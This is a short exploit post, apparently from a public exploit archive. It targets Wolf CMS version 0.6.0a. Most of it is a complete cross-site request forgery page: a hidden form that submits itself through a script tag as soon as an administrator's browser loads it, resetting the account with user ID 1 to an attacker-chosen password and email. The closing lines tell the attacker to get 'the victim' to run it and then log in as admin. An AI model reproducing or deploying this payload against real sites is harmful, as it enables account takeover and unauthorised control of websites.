Wolf CMS 0.6.0a Cross Site Request Forgery

`Exploit Title: Wolf CMS Change Admin Password CSRF  
  
Date: 2010-04-03  
  
Author: Stefan M.  
  
Software Link: http://www.wolfcms.org/  
  
Version: 0.6.0a  
  
Email: [email protected]  
  
GreeTz to: d14l(a.k.a Teo) & baltazar  
  
--- START OF HTML CODE ---  
  
<form action="http://[website]/admin/?/user/edit/1" method="post">  
<input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="Administrator" />  
<input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="[your email]" />  
<input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin" disabled="disabled" />  
<input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="[enter desired password]" />  
<input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="[repeat the password]" />  
<input checked="checked" id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1" />  
<input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2" />  
<input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3" />  
<select class="select" id="user_language" name="user[language]">  
<option value="bn">Bengali</option>  
<option value="zh">Chinese</option>  
<option value="hr">Croatian</option>  
<option value="cs">Czech</option>  
<option value="da">Danish</option>  
<option value="nl">Dutch</option>  
<option value="en" selected="selected">English</option>  
<option value="fr">French</option>  
<option value="de">German</option>  
<option value="hu">Hungarian</option>  
<option value="id">Indonesian</option>  
<option value="it">Italian</option>  
<option value="ja">Japanese</option>  
<option value="no">Norwegian</option>  
<option value="pl">Polish</option>  
<option value="pt">Portuguese</option>  
<option value="ru">Russian</option>  
<option value="es">Spanish</option>  
<option value="sv">Swedish</option>  
</select>  
<script>document.forms[0].submit()</script>  
</form>  
  
--- END OF HTML CODE ---  
  
You dont have to change username of the administrator,since this code will change the  
password of the user with the ID 1.  
  
After the victim executes this code,the password will be changed to your desired password.  
Later,just visit: http://[website]/admin/?/login  
  
and type  
username: admin  
password: [desired password]  
  
# If you have any questions whatsoever,feel free to contact me.  
`